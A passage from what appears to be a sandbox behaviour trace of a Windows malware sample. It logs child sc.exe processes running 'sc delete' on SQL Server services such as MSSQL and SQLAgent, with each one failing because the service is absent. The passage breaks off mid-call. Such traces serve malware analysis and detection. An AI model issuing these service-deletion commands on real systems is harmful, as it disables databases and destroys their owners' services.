filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1639 start_va = 0x675c3c0000 end_va = 0x675c4bffff entry_point = 0x0 region_type = private name = "private_0x000000675c3c0000" filename = "" Region: id = 1640 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1641 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5128 start_va = 0x675c1b0000 end_va = 0x675c1bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000675c1b0000" filename = "" Region: id = 5129 start_va = 0x675c1c0000 end_va = 0x675c1c6fff entry_point = 0x0 region_type = private name = "private_0x000000675c1c0000" filename = "" Region: id = 5130 start_va = 0x675c2a0000 end_va = 0x675c35dfff entry_point = 0x675c2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5131 start_va = 0x675c4c0000 end_va = 0x675c53ffff entry_point = 0x0 region_type = private name = "private_0x000000675c4c0000" filename = "" Region: id = 5132 start_va = 0x675c670000 end_va = 0x675c67ffff entry_point = 0x0 region_type = private name = "private_0x000000675c670000" filename = "" Region: id = 5133 start_va = 0x7ff67a9b0000 end_va = 0x7ff67aaaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a9b0000" filename = "" Region: id = 5134 start_va = 0x7ff67aadb000 end_va = 0x7ff67aadcfff entry_point = 0x0 region_type = private name = "private_0x00007ff67aadb000" filename = "" Region: id = 5135 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5136 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5143 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5144 start_va = 0x675c360000 end_va = 0x675c366fff entry_point = 0x0 region_type = private name = "private_0x000000675c360000" filename = "" Region: id = 5145 start_va = 0x675c540000 end_va = 0x675c61efff entry_point = 0x675c540000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5146 start_va = 0x675c370000 end_va = 0x675c381fff entry_point = 0x675c370000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 66 os_tid = 0xd08 [0076.224] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0076.224] __set_app_type (_Type=0x1) [0076.224] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0076.224] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0076.225] SetThreadUILanguage (LangId=0x0) returned 0x409 [0076.358] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.358] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0076.358] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0076.358] _wcsicmp (_String1="delete", _String2="query") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="start") returned -15 [0076.358] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0076.358] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0076.358] _wcsicmp (_String1="delete", _String2="control") returned 1 [0076.358] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0076.358] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0076.358] _wcsicmp (_String1="delete", _String2="config") returned 1 [0076.358] _wcsicmp (_String1="delete", _String2="description") returned -7 [0076.358] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0076.358] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0076.358] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0076.358] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0076.358] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0076.358] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0076.358] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0076.358] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0076.358] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0076.358] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0076.358] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0076.358] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0076.360] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x675c3c8b30 [0076.364] OpenServiceW (hSCManager=0x675c3c8b30, lpServiceName="MSSQL", dwDesiredAccess=0x10000) returned 0x0 [0076.364] GetLastError () returned 0x424 [0076.365] _ultow (in: _Dest=0x424, _Radix=1546059000 | out: _Dest=0x424) returned="1060" [0076.365] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0076.366] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x675c26fcb0, nSize=0x2, Arguments=0x675c26fce0 | out: lpBuffer="鎰尼g") returned 0x62 [0076.366] GetFileType (hFile=0x24) returned 0x2 [0076.366] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x675c26fc60 | out: lpMode=0x675c26fc60) returned 1 [0076.438] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x675c3c93b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x675c26fc58, lpReserved=0x0 | out: lpBuffer=0x675c3c93b0*, lpNumberOfCharsWritten=0x675c26fc58*=0x62) returned 1 [0076.438] LocalFree (hMem=0x675c3c93b0) returned 0x0 [0076.438] LocalFree (hMem=0x0) returned 0x0 [0076.438] CloseServiceHandle (hSCObject=0x675c3c8b30) returned 1 [0076.439] LocalFree (hMem=0x0) returned 0x0 [0076.439] exit (_Code=1060) Thread: id = 325 os_tid = 0x1260 Process: id = "39" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xb5bf000" os_pid = "0xd0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"SQLAgent\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1010 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1011 start_va = 0x722bc00000 end_va = 0x722bc1ffff entry_point = 0x0 region_type = private name = "private_0x000000722bc00000" filename = "" Region: id = 1012 start_va = 0x722bc20000 end_va = 0x722bc33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000722bc20000" filename = "" Region: id = 1013 start_va = 0x722bc40000 end_va = 0x722bcbffff entry_point = 0x0 region_type = private name = "private_0x000000722bc40000" filename = "" Region: id = 1014 start_va = 0x722bcc0000 end_va = 0x722bcc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000722bcc0000" filename = "" Region: id = 1015 start_va = 0x722bcd0000 end_va = 0x722bcd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000722bcd0000" filename = "" Region: id = 1016 start_va = 0x722bce0000 end_va = 0x722bce1fff entry_point = 0x0 region_type = private name = "private_0x000000722bce0000" filename = "" Region: id = 1017 start_va = 0x7df5ffd00000 end_va = 0x7ff5ffcfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffd00000" filename = "" Region: id = 1018 start_va = 0x7ff67a220000 end_va = 0x7ff67a242fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a220000" filename = "" Region: id = 1019 start_va = 0x7ff67a24d000 end_va = 0x7ff67a24efff entry_point = 0x0 region_type = private name = "private_0x00007ff67a24d000" filename = "" Region: id = 1020 start_va = 0x7ff67a24f000 end_va = 0x7ff67a24ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a24f000" filename = "" Region: id = 1021 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1022 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1642 start_va = 0x722bd30000 end_va = 0x722be2ffff entry_point = 0x0 region_type = private name = "private_0x000000722bd30000" filename = "" Region: id = 1643 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1644 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5325 start_va = 0x722bc00000 end_va = 0x722bc0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000722bc00000" filename = "" Region: id = 5326 start_va = 0x722bc10000 end_va = 0x722bc16fff entry_point = 0x0 region_type = private name = "private_0x000000722bc10000" filename = "" Region: id = 5327 start_va = 0x722be30000 end_va = 0x722beedfff entry_point = 0x722be30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5328 start_va = 0x722bef0000 end_va = 0x722bf6ffff entry_point = 0x0 region_type = private name = "private_0x000000722bef0000" filename = "" Region: id = 5329 start_va = 0x722c140000 end_va = 0x722c14ffff entry_point = 0x0 region_type = private name = "private_0x000000722c140000" filename = "" Region: id = 5330 start_va = 0x7ff67a120000 end_va = 0x7ff67a21ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a120000" filename = "" Region: id = 5331 start_va = 0x7ff67a24b000 end_va = 0x7ff67a24cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a24b000" filename = "" Region: id = 5332 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5333 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5347 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5348 start_va = 0x722bcf0000 end_va = 0x722bcf6fff entry_point = 0x0 region_type = private name = "private_0x000000722bcf0000" filename = "" Region: id = 5349 start_va = 0x722bf70000 end_va = 0x722c04efff entry_point = 0x722bf70000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5350 start_va = 0x722bd00000 end_va = 0x722bd11fff entry_point = 0x722bd00000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 67 os_tid = 0xd10 [0078.402] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0078.402] __set_app_type (_Type=0x1) [0078.402] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0078.402] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0078.402] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.503] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.503] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0078.503] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0078.504] _wcsicmp (_String1="delete", _String2="query") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="start") returned -15 [0078.504] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0078.504] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0078.504] _wcsicmp (_String1="delete", _String2="control") returned 1 [0078.504] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0078.504] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0078.504] _wcsicmp (_String1="delete", _String2="config") returned 1 [0078.504] _wcsicmp (_String1="delete", _String2="description") returned -7 [0078.504] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0078.504] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0078.504] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0078.504] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0078.504] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0078.504] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0078.504] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0078.504] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0078.504] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0078.504] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0078.504] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0078.504] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0078.506] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x722bd38e30 [0078.510] OpenServiceW (hSCManager=0x722bd38e30, lpServiceName="SQLAgent", dwDesiredAccess=0x10000) returned 0x0 [0078.511] GetLastError () returned 0x424 [0078.511] _ultow (in: _Dest=0x424, _Radix=734786968 | out: _Dest=0x424) returned="1060" [0078.511] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0078.513] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x722bcbf550, nSize=0x2, Arguments=0x722bcbf580 | out: lpBuffer="鎰⯓r") returned 0x62 [0078.513] GetFileType (hFile=0x24) returned 0x2 [0078.513] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x722bcbf500 | out: lpMode=0x722bcbf500) returned 1 [0078.561] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x722bd393b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x722bcbf4f8, lpReserved=0x0 | out: lpBuffer=0x722bd393b0*, lpNumberOfCharsWritten=0x722bcbf4f8*=0x62) returned 1 [0078.561] LocalFree (hMem=0x722bd393b0) returned 0x0 [0078.561] LocalFree (hMem=0x0) returned 0x0 [0078.561] CloseServiceHandle (hSCObject=0x722bd38e30) returned 1 [0078.562] LocalFree (hMem=0x0) returned 0x0 [0078.562] exit (_Code=1060) Thread: id = 339 os_tid = 0x1304 Process: id = "40" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xef84000" os_pid = "0xd14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"MSSQLServerADHelper100\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1023 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1024 start_va = 0xfc42110000 end_va = 0xfc4212ffff entry_point = 0x0 region_type = private name = "private_0x000000fc42110000" filename = "" Region: id = 1025 start_va = 0xfc42130000 end_va = 0xfc42143fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fc42130000" filename = "" Region: id = 1026 start_va = 0xfc42150000 end_va = 0xfc421cffff entry_point = 0x0 region_type = private name = "private_0x000000fc42150000" filename = "" Region: id = 1027 start_va = 0xfc421d0000 end_va = 0xfc421d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fc421d0000" filename = "" Region: id = 1028 start_va = 0xfc421e0000 end_va = 0xfc421e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fc421e0000" filename = "" Region: id = 1029 start_va = 0xfc421f0000 end_va = 0xfc421f1fff entry_point = 0x0 region_type = private name = "private_0x000000fc421f0000" filename = "" Region: id = 1030 start_va = 0x7df5ff060000 end_va = 0x7ff5ff05ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff060000" filename = "" Region: id = 1031 start_va = 0x7ff679fd0000 end_va = 0x7ff679ff2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679fd0000" filename = "" Region: id = 1032 start_va = 0x7ff679ffd000 end_va = 0x7ff679ffefff entry_point = 0x0 region_type = private name = "private_0x00007ff679ffd000" filename = "" Region: id = 1033 start_va = 0x7ff679fff000 end_va = 0x7ff679ffffff entry_point = 0x0 region_type = private name = "private_0x00007ff679fff000" filename = "" Region: id = 1034 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1035 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1645 start_va = 0xfc422d0000 end_va = 0xfc423cffff entry_point = 0x0 region_type = private name = "private_0x000000fc422d0000" filename = "" Region: id = 1646 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1647 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5316 start_va = 0xfc42110000 end_va = 0xfc4211ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fc42110000" filename = "" Region: id = 5317 start_va = 0xfc42120000 end_va = 0xfc42126fff entry_point = 0x0 region_type = private name = "private_0x000000fc42120000" filename = "" Region: id = 5318 start_va = 0xfc42200000 end_va = 0xfc422bdfff entry_point = 0xfc42200000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5319 start_va = 0xfc423d0000 end_va = 0xfc4244ffff entry_point = 0x0 region_type = private name = "private_0x000000fc423d0000" filename = "" Region: id = 5320 start_va = 0xfc42540000 end_va = 0xfc4254ffff entry_point = 0x0 region_type = private name = "private_0x000000fc42540000" filename = "" Region: id = 5321 start_va = 0x7ff679ed0000 end_va = 0x7ff679fcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679ed0000" filename = "" Region: id = 5322 start_va = 0x7ff679ffb000 end_va = 0x7ff679ffcfff entry_point = 0x0 region_type = private name = "private_0x00007ff679ffb000" filename = "" Region: id = 5323 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5324 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5343 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5344 start_va = 0xfc422c0000 end_va = 0xfc422c6fff entry_point = 0x0 region_type = private name = "private_0x000000fc422c0000" filename = "" Region: id = 5345 start_va = 0xfc42450000 end_va = 0xfc4252efff entry_point = 0xfc42450000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5346 start_va = 0xfc42550000 end_va = 0xfc42561fff entry_point = 0xfc42550000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 68 os_tid = 0xd18 [0078.389] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0078.389] __set_app_type (_Type=0x1) [0078.389] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0078.389] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0078.389] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.493] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.493] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0078.493] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0078.493] _wcsicmp (_String1="delete", _String2="query") returned -13 [0078.493] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0078.493] _wcsicmp (_String1="delete", _String2="start") returned -15 [0078.493] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0078.493] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0078.493] _wcsicmp (_String1="delete", _String2="control") returned 1 [0078.493] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0078.493] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0078.493] _wcsicmp (_String1="delete", _String2="config") returned 1 [0078.493] _wcsicmp (_String1="delete", _String2="description") returned -7 [0078.493] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0078.493] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0078.493] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0078.493] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0078.493] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0078.493] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0078.493] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0078.493] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0078.494] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0078.494] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0078.494] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0078.494] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0078.494] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0078.494] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0078.494] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0078.494] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0078.494] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0078.494] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0078.494] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0078.494] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0078.494] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0078.494] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0078.495] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xfc422d8c20 [0078.500] OpenServiceW (hSCManager=0xfc422d8c20, lpServiceName="MSSQLServerADHelper100", dwDesiredAccess=0x10000) returned 0x0 [0078.500] GetLastError () returned 0x424 [0078.500] _ultow (in: _Dest=0x424, _Radix=1109194776 | out: _Dest=0x424) returned="1060" [0078.500] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0078.501] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xfc421cf7d0, nSize=0x2, Arguments=0xfc421cf800 | out: lpBuffer="顠䈭ü") 